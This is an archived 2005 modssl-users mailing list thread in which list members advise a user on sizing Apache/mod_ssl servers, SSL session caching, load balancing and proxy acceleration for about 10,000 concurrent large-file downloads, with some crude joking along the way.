>>>> Should I definitly look at clustering?
>>>>
>>>> Also.. I ahve heard about ssl session key caching, anyone know  
>>>> how much this
>>>> will improve things?
>>>>
>>>> Any good resources I can read?
>>>>
>>>>
>>>> thanks!
>>>> Lee
>>>> ___________________________________________________________________ 
>>>> ___
>>>> Apache Interface to OpenSSL (mod_ssl)                    
>>>> www.modssl.org
>>>> User Support Mailing List                      modssl- 
>>>> users@modssl.org
>>>> Automated List Manager                             
>>>> majordomo@modssl.org
>>>>
>>>>
>>>
>>>
>> _____________________________________________________________________ 
>> _
>> Apache Interface to OpenSSL (mod_ssl)                    
>> www.modssl.org
>> User Support Mailing List                      modssl- 
>> users@modssl.org
>> Automated List Manager                             
>> majordomo@modssl.org
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFDOCI8klVhPAXg8nARAiP2AJ9sBkSOKy4mtsctO3XAb2RbXhLnAACgkXh7
k9Fs38X1Q8nJ5b5t2Xg43kA=
=awV5
-----END PGP SIGNATURE-----
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 18:38:10 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8123114D86A; Mon, 26 Sep 2005 18:38:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id EC4BA14D832
	for ; Mon, 26 Sep 2005 18:38:09 +0200 (CEST)
Received: from localhost.localdomain (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id j8QGacuQ027305
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 26 Sep 2005 09:36:39 -0700 (PDT)
Received: (from pehrens@localhost)
	by localhost.localdomain (8.13.4/8.13.4/Submit) id j8QGc2Ev031692
	for modssl-users@modssl.org; Mon, 26 Sep 2005 09:38:02 -0700
Date: Mon, 26 Sep 2005 09:38:02 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
Message-ID: <20050926163802.GF30896@ligo.caltech.edu>
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <4338194E.7070306@w3works.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.2.1i
Shoe-Size: 9-1/2
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 2281879 - 6c7c5e38f79f
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Aaron Turner wrote:
> 
> I gotta ask though, just what are you doing where you expect 100K  
> people trying to download a 15MB file all at the same time?  You  
> working for Microsoft and planning the next security tuesday patch  
> update or something? :)

That or he has the video of Gates getting raped by the penguin.

Oops, I hope this isn't a family list.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 18:53:25 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1903314D84C; Mon, 26 Sep 2005 18:53:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.istop.com (smtp.istop.com [66.11.167.126])
	by master.modssl.org (Postfix) with ESMTP id A25D514D82A
	for ; Mon, 26 Sep 2005 18:53:24 +0200 (CEST)
Received: from ns.istop.com (ns.istop.com [209.195.118.109])
	by smtp.istop.com (Postfix) with ESMTP id 003532B3C8
	for ; Mon, 26 Sep 2005 12:56:26 -0400 (EDT)
Date: Mon, 26 Sep 2005 12:53:05 -0400 (EDT)
From: Jeffrey Burgoyne 
X-X-Sender: burgoyne@ns.istop.com
To: "modssl-users@modssl.org" 
Subject: Re: Mod_ssl and how to reduce overhead
In-Reply-To: <002201c5c2ae$e8120400$02fea8c0@desktop>
Message-ID: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
  <06e501c5c296$b8334d60$02fea8c0@desktop>
  <002201c5c2ae$e8120400$02fea8c0@desktop>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeffrey Burgoyne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just wondering, is this for the charter.net music download? I cannot
believe you would have 100,000 comcurrent connections for a service such
as that. I also see the download file is listed at 1.5MB, not 15.

As as for bandwidth, that better be upgraded. It took over a minute just
to download the home page of off charter.net.

Jeffrey Burgoyne

Chief Technology Architect
KCSI Keenuh Consulting Services Inc
burgoyne@keenuh.com

On Mon, 26 Sep 2005, Pigeon wrote:

> Hmm.. 10k -100k are pretty much  guaranteed numbers..
>
> So my main computer crunching will be done at the beginning? (and to relive
> this I can do session key caching.. how long can I cache a key? is this
> 'secure'?)  (also.. all transfers will be ~15megs in size)
>
> And using a single server is out of the question?
>
> If we just go with one server.. shouldn't it be something super fast.. amd64
> 1gig ram?
>
> thanks!
> Lee
>
>
> >
> > On Mon, 26 Sep 2005, Pigeon wrote:
> >
> >> Hello, I am trying to plan a system that can handle 10k-100k users.
> >>
> >> I am only using apache w/mod-ssl
> >>
> >> What should I look at to reduce overhead of bandwidth/cpu/mem?
> >>
> >> At what point should I look at ssl accelerators?
> >>
> >> Should I definitly look at clustering?
> >>
> >> Also.. I ahve heard about ssl session key caching, anyone know how much
> >> this
> >> will improve things?
> >>
> >> Any good resources I can read?
> >>
> >>
> >> thanks!
> >> Lee
> >> ______________________________________________________________________
> >> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >> User Support Mailing List                      modssl-users@modssl.org
> >> Automated List Manager                            majordomo@modssl.org
> >>
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 19:12:36 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3D44E14D84C; Mon, 26 Sep 2005 19:12:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 0EF3D14D82A
	for ; Mon, 26 Sep 2005 19:12:35 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id A744151D4
	for ; Mon, 26 Sep 2005 19:27:36 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 04185-02 for ;
 Mon, 26 Sep 2005 19:27:28 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 88A2151DD; Mon, 26 Sep 2005 19:27:28 +0200 (CEST)
Date: Mon, 26 Sep 2005 19:27:28 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
Message-ID: <20050926172728.GH26776@cr>
Mail-Followup-To: modssl-users@modssl.org
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <002201c5c2ae$e8120400$02fea8c0@desktop>
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Sep 26, 2005 at 11:28:11AM -0400, Pigeon wrote:
> Hmm.. 10k -100k are pretty much  guaranteed numbers..
> 
That's quite a wide margin. Are we talking concurrent users or just
number of people who could be using it over a period of xx?

> So my main computer crunching will be done at the beginning? (and to relive 
> this I can do session key caching.. how long can I cache a key? is this 
> 'secure'?)  (also.. all transfers will be ~15megs in size)
> 
well, with 15meg files you've got more work to do encrypting the content
as the session goes along. You can cache the key as long as you want,
but depending on the type of encryption used, most browsers will not
allow the key to live for all that long. I usually run for about 1 hour,
but ymmv depending on the chosen parameters.

> And using a single server is out of the question?
> 
the number of concurrent users has very much to say in that regard.
Maybe an ibm power 5 64 proc or a fully loaded sun e25k - and add an
ssl accelerator to the mix.

> If we just go with one server.. shouldn't it be something super fast.. 
> amd64 1gig ram?
> 
Super fast / amd 64 with only 1 gig mem? you've got to be kidding - I'm
pretty sure you couldn't keep even without SSL.
Doesn't your pr0n streaming business generate enough income to pay for a
real server? ;)

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 21:15:22 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E4FC914D86A; Mon, 26 Sep 2005 21:15:22 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mxsf37.cluster1.charter.net (mxsf37.cluster1.charter.net [209.225.28.162])
	by master.modssl.org (Postfix) with ESMTP id 1A7C314D82A
	for ; Mon, 26 Sep 2005 21:15:21 +0200 (CEST)
Received: from mxip07a.cluster1.charter.net (mxip07a.cluster1.charter.net [209.225.28.137])
	by mxsf37.cluster1.charter.net (8.12.11/8.12.11) with ESMTP id j8QJFHAc006203
	for ; Mon, 26 Sep 2005 15:15:18 -0400
Received: from 68-117-211-186.dhcp.athn.ga.charter.com (HELO desktop) ([68.117.211.186])
  by mxip07a.cluster1.charter.net with SMTP; 26 Sep 2005 15:15:02 -0400
X-IronPort-AV: i="3.97,146,1125892800"; 
   d="scan'208"; a="1424447339:sNHT425954804"
Message-ID: <006801c5c2ce$9cf28c40$02fea8c0@desktop>
From: "Pigeon" 
To: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <20050926172728.GH26776@cr>
Subject: Re: Mod_ssl and how to reduce overhead
Date: Mon, 26 Sep 2005 15:14:56 -0400
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Pigeon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ok, lets assume I can get a network connection with:
A)10mbit
B)100mbit
C)1000mbit

And I will have 10k concurrent downloads (let us throw out 100k for now.. 
because i can alwasy scale up figures if we get a base).

(The reason I say 10k concurrent is because we have an update system (sorta 
like windows update).. and as soon as we tell their computer to update, we 
have 10k boxes saying give me the file!)

So my question is..
What would be the best (given we cannot do blades or the like since we have 
to use 'standard' 1u/2u/4u boxes from the dedi center).
Should we definitly beat the problem with iron and get 5servers doing load 
balancing? 2servers? If 2servers go with the 1000mbit connection?



thank you for all of your time and input!

thanks
Lee





----- Original Message ----- 
From: "Mads Toftum" 
To: 
Sent: Monday, September 26, 2005 1:27 PM
Subject: Re: Mod_ssl and how to reduce overhead


> On Mon, Sep 26, 2005 at 11:28:11AM -0400, Pigeon wrote:
>> Hmm.. 10k -100k are pretty much  guaranteed numbers..
>>
> That's quite a wide margin. Are we talking concurrent users or just
> number of people who could be using it over a period of xx?
>
>> So my main computer crunching will be done at the beginning? (and to 
>> relive
>> this I can do session key caching.. how long can I cache a key? is this
>> 'secure'?)  (also.. all transfers will be ~15megs in size)
>>
> well, with 15meg files you've got more work to do encrypting the content
> as the session goes along. You can cache the key as long as you want,
> but depending on the type of encryption used, most browsers will not
> allow the key to live for all that long. I usually run for about 1 hour,
> but ymmv depending on the chosen parameters.
>
>> And using a single server is out of the question?
>>
> the number of concurrent users has very much to say in that regard.
> Maybe an ibm power 5 64 proc or a fully loaded sun e25k - and add an
> ssl accelerator to the mix.
>
>> If we just go with one server.. shouldn't it be something super fast..
>> amd64 1gig ram?
>>
> Super fast / amd 64 with only 1 gig mem? you've got to be kidding - I'm
> pretty sure you couldn't keep even without SSL.
> Doesn't your pr0n streaming business generate enough income to pay for a
> real server? ;)
>
> vh
>
> Mads Toftum
> -- 
> `Darn it, who spiked my coffee with water?!' - lwall
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 21:38:08 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6E80D14D84C; Mon, 26 Sep 2005 21:38:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from kelvin.pobox.com (kelvin.pobox.com [207.8.226.2])
	by master.modssl.org (Postfix) with ESMTP id A1DBD14D82A
	for ; Mon, 26 Sep 2005 21:38:07 +0200 (CEST)
Received: from asterisk.pobox.com (asterisk.pobox.com [207.106.36.222])
	by kelvin.pobox.com (Postfix) with ESMTP id E488A3D3DA8
	for ; Mon, 26 Sep 2005 15:36:53 -0400 (EDT)
Received: from asterisk (localhost [127.0.0.1])
	by asterisk.pobox.com (Postfix) with ESMTP id 1B0DEE57
	for ; Mon, 26 Sep 2005 15:36:43 -0400 (EDT)
Received: from webmail.pobox.com (localhost [127.0.0.1])
	by asterisk.pobox.com (Postfix) with ESMTP id EA4A2B0A
	for ; Mon, 26 Sep 2005 15:36:42 -0400 (EDT)
Received: from 69.55.70.22
        (SquirrelMail authenticated user dparis@w3works.com);
        by webmail.pobox.com with HTTP;
        Mon, 26 Sep 2005 15:36:42 -0400 (EDT)
Message-ID: <37223.69.55.70.22.1127763402.squirrel@69.55.70.22>
In-Reply-To: <006801c5c2ce$9cf28c40$02fea8c0@desktop>
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
    
    <06e501c5c296$b8334d60$02fea8c0@desktop>
    
    <002201c5c2ae$e8120400$02fea8c0@desktop> <20050926172728.GH26776@cr>
    <006801c5c2ce$9cf28c40$02fea8c0@desktop>
Date: Mon, 26 Sep 2005 15:36:42 -0400 (EDT)
Subject: Re: Mod_ssl and how to reduce overhead
From: dparis@w3works.com
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.3-RC1
X-Mailer: SquirrelMail/1.4.3-RC1
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: dparis@w3works.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You're not looking at your problem from the right angle.

10K users... asking for the SAME file.  Set up a smallish farm of four or
five machines and use a HTTP Acclerator. (basically a Squid proxy turned
on it's head - the examples exist in the config file for squid .. look at
the http accelerator mode).

Then use an SSL terminating proxy cluster on the frontend .. now you have
0 disk contention since the file will be sent straight from RAM.

What you now need to know is the distribution of connection speeds for
your users.  If they're on T3's, you have no choice but to go with GigE.
.. Frankly, you're probably looking at some sort of GigE burstable product
offering anyway.

Ok .. enough's enough .. Your original question has been answered long ago
and you've heard from everyone with additional information and ideas.
We're getting very close to the point of engineering this solution for
you.  Either you can take it from here or hire some of us as consultants
to work out the rest of the engineering for you.  Free software is one
thing .. free engineering is quite another.

Best~
-d

> Ok, lets assume I can get a network connection with:
> A)10mbit
> B)100mbit
> C)1000mbit
>
> And I will have 10k concurrent downloads (let us throw out 100k for now..
> because i can alwasy scale up figures if we get a base).
>
> (The reason I say 10k concurrent is because we have an update system
> (sorta
> like windows update).. and as soon as we tell their computer to update, we
> have 10k boxes saying give me the file!)
>
> So my question is..
> What would be the best (given we cannot do blades or the like since we
> have
> to use 'standard' 1u/2u/4u boxes from the dedi center).
> Should we definitly beat the problem with iron and get 5servers doing load
> balancing? 2servers? If 2servers go with the 1000mbit connection?
>
>
>
> thank you for all of your time and input!
>
> thanks
> Lee
>
>
>
>
>
> ----- Original Message -----
> From: "Mads Toftum" 
> To: 
> Sent: Monday, September 26, 2005 1:27 PM
> Subject: Re: Mod_ssl and how to reduce overhead
>
>
>> On Mon, Sep 26, 2005 at 11:28:11AM -0400, Pigeon wrote:
>>> Hmm.. 10k -100k are pretty much  guaranteed numbers..
>>>
>> That's quite a wide margin. Are we talking concurrent users or just
>> number of people who could be using it over a period of xx?
>>
>>> So my main computer crunching will be done at the beginning? (and to
>>> relive
>>> this I can do session key caching.. how long can I cache a key? is this
>>> 'secure'?)  (also.. all transfers will be ~15megs in size)
>>>
>> well, with 15meg files you've got more work to do encrypting the content
>> as the session goes along. You can cache the key as long as you want,
>> but depending on the type of encryption used, most browsers will not
>> allow the key to live for all that long. I usually run for about 1 hour,
>> but ymmv depending on the chosen parameters.
>>
>>> And using a single server is out of the question?
>>>
>> the number of concurrent users has very much to say in that regard.
>> Maybe an ibm power 5 64 proc or a fully loaded sun e25k - and add an
>> ssl accelerator to the mix.
>>
>>> If we just go with one server.. shouldn't it be something super fast..
>>> amd64 1gig ram?
>>>
>> Super fast / amd 64 with only 1 gig mem? you've got to be kidding - I'm
>> pretty sure you couldn't keep even without SSL.
>> Doesn't your pr0n streaming business generate enough income to pay for a
>> real server? ;)
>>
>> vh
>>
>> Mads Toftum
>> --
>> `Darn it, who spiked my coffee with water?!' - lwall
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 21:39:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E95E814D84C; Mon, 26 Sep 2005 21:39:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.istop.com (smtp.istop.com [66.11.167.126])
	by master.modssl.org (Postfix) with ESMTP id 9BC0214D82A
	for ; Mon, 26 Sep 2005 21:39:29 +0200 (CEST)
Received: from ns.istop.com (ns.istop.com [209.195.118.109])
	by smtp.istop.com (Postfix) with ESMTP id E790C2B3CB
	for ; Mon, 26 Sep 2005 15:42:31 -0400 (EDT)
Date: Mon, 26 Sep 2005 15:39:11 -0400 (EDT)
From: Jeffrey Burgoyne 
X-X-Sender: burgoyne@ns.istop.com
To: "modssl-users@modssl.org" 
Subject: Re: Mod_ssl and how to reduce overhead
In-Reply-To: <006801c5c2ce$9cf28c40$02fea8c0@desktop>
Message-ID: 
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>
  <06e501c5c296$b8334d60$02fea8c0@desktop>
  <002201c5c2ae$e8120400$02fea8c0@desktop>
 <20050926172728.GH26776@cr> <006801c5c2ce$9cf28c40$02fea8c0@desktop>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeffrey Burgoyne 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Well, the math is simple

1000mbit/10000 users = 100 kilobit/sec, or 12K per second, or 1200
seconds, 20 minutes per downlaod. Marginally acceptable by todays
standards.

To concurrently process that much data, that many connections, you will
want a load balancer out front.

With the system I'm currently administering, with a dual 3Gig Xeon we can
safely handle about 2000 concurrent connections non SSL, although we have
a rather overweight config. I would expect you need at least two boxes,
and 5 would probably not be overkill.

BTW, do you really need SSL? From a project design perspective, would it
be possible to encrypt the file to be down downloaded (encryption cost
only once)? Then using sendfile you could really have it hum.


Jeffrey Burgoyne

Chief Technology Architect
KCSI Keenuh Consulting Services Inc
burgoyne@keenuh.com

On Mon, 26 Sep 2005, Pigeon wrote:

> Ok, lets assume I can get a network connection with:
> A)10mbit
> B)100mbit
> C)1000mbit
>
> And I will have 10k concurrent downloads (let us throw out 100k for now..
> because i can alwasy scale up figures if we get a base).
>
> (The reason I say 10k concurrent is because we have an update system (sorta
> like windows update).. and as soon as we tell their computer to update, we
> have 10k boxes saying give me the file!)
>
> So my question is..
> What would be the best (given we cannot do blades or the like since we have
> to use 'standard' 1u/2u/4u boxes from the dedi center).
> Should we definitly beat the problem with iron and get 5servers doing load
> balancing? 2servers? If 2servers go with the 1000mbit connection?
>
>
>
> thank you for all of your time and input!
>
> thanks
> Lee
>
>
>
>
>
> ----- Original Message -----
> From: "Mads Toftum" 
> To: 
> Sent: Monday, September 26, 2005 1:27 PM
> Subject: Re: Mod_ssl and how to reduce overhead
>
>
> > On Mon, Sep 26, 2005 at 11:28:11AM -0400, Pigeon wrote:
> >> Hmm.. 10k -100k are pretty much  guaranteed numbers..
> >>
> > That's quite a wide margin. Are we talking concurrent users or just
> > number of people who could be using it over a period of xx?
> >
> >> So my main computer crunching will be done at the beginning? (and to
> >> relive
> >> this I can do session key caching.. how long can I cache a key? is this
> >> 'secure'?)  (also.. all transfers will be ~15megs in size)
> >>
> > well, with 15meg files you've got more work to do encrypting the content
> > as the session goes along. You can cache the key as long as you want,
> > but depending on the type of encryption used, most browsers will not
> > allow the key to live for all that long. I usually run for about 1 hour,
> > but ymmv depending on the chosen parameters.
> >
> >> And using a single server is out of the question?
> >>
> > the number of concurrent users has very much to say in that regard.
> > Maybe an ibm power 5 64 proc or a fully loaded sun e25k - and add an
> > ssl accelerator to the mix.
> >
> >> If we just go with one server.. shouldn't it be something super fast..
> >> amd64 1gig ram?
> >>
> > Super fast / amd 64 with only 1 gig mem? you've got to be kidding - I'm
> > pretty sure you couldn't keep even without SSL.
> > Doesn't your pr0n streaming business generate enough income to pay for a
> > real server? ;)
> >
> > vh
> >
> > Mads Toftum
> > --
> > `Darn it, who spiked my coffee with water?!' - lwall
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 26 21:48:20 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D638114D84C; Mon, 26 Sep 2005 21:48:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from acrux.ligo.caltech.edu (acrux.ligo.caltech.edu [131.215.115.14])
	by master.modssl.org (Postfix) with ESMTP id 48B7414D82A
	for ; Mon, 26 Sep 2005 21:48:19 +0200 (CEST)
Received: from localhost.localdomain (tarazed [131.215.115.31])
	by acrux.ligo.caltech.edu (8.12.11/8.12.11) with ESMTP id j8QJkhtI000461
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for ; Mon, 26 Sep 2005 12:46:49 -0700 (PDT)
Received: (from pehrens@localhost)
	by localhost.localdomain (8.13.4/8.13.4/Submit) id j8QJm70T001036
	for modssl-users@modssl.org; Mon, 26 Sep 2005 12:48:07 -0700
Date: Mon, 26 Sep 2005 12:48:07 -0700
From: Phil Ehrens 
To: modssl-users@modssl.org
Subject: Re: Mod_ssl and how to reduce overhead
Message-ID: <20050926194806.GC31961@ligo.caltech.edu>
References: <66FF0611-7BF2-4FC0-A064-6104EAE3A2E2@cse.snu.ac.kr>  <06e501c5c296$b8334d60$02fea8c0@desktop>  <002201c5c2ae$e8120400$02fea8c0@desktop> <20050926172728.GH26776@cr> <006801c5c2ce$9cf28c40$02fea8c0@desktop>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <006801c5c2ce$9cf28c40$02fea8c0@desktop>
User-Agent: Mutt/1.4.2.1i
Shoe-Size: 9-1/2
X-Spam-Score: undef - Domain Whitelisted (ligo.caltech.edu: )
X-Canit-Stats-ID: 2282645 - 56eaba645438
X-Scanned-By: CanIt (www . roaringpenguin . com) on 131.215.115.14
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Phil Ehrens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Pigeon wrote:
> Ok, lets assume I can get a network connection with:
> A)10mbit
> B)100mbit
> C)1000mbit
> 
> And I will have 10k concurrent downloads (let us throw out 100k for now.. 
> because i can alwasy scale up figures if we get a base).
> 
> (The reason I say 10k concurrent is because we have an update system (sorta 
> like windows update).. and as soon as we tell their computer to update, we 
> have 10k boxes saying give me the file!)
> 
> So my question is..
> What would be the best (given we cannot do blades or the like since we have 
> to use 'standard' 1u/2u/4u boxes from the dedi center).
> Should we definitly beat the problem with iron and get 5servers doing load 
> balancing? 2servers? If 2servers go with the 1000mbit connection?

The short answer is that you need to benchmark using various
configurations. You have a particularly bad problem, what with
the per-request encryption beating on the CPU's, and the large
file size beating on the network (and putting your servers at
the mercy of the clients).

Pushing all of the solutions downstream like this instead of
coming up with a better front-end is going to cost you. This
all just screams for a more elegant solution than just asking
apache to stick it's finger in the dike.

Good luck.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep 27 00:20:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A1C6E14D84B; Tue, 27 Sep 2005 00:20:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.193])
	by master.modssl.org (Postfix) with ESMTP id 223DF14D829
	for ; Tue, 27 Sep 2005 00:20:02 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so1408299wxd
        for ; Mon, 26 Sep 2005 15:20:01 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=iTTiw0f8zeWgUzFErgXipdcTs9o8OJ+Z+X4QWMD9TxUso8HRQ8UzXUGHmjgTI+y+fsEDKUKlJA5ujSONIeGHXr6zxtRnHj2LJ3uR7bBhovFz1Exn+KXlT9yRGkPNu/PXotsm5evexeu8cWGDYMWmDAet9RxUp38/9aHFn5G53vQ=
Received: by 10.70.53.9 with SMTP id b9mr2614321wxa;
        Mon, 26 Sep 2005 15:20:01 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Mon, 26 Sep 2005 15:20:01 -0700 (PDT)
Message-ID: 
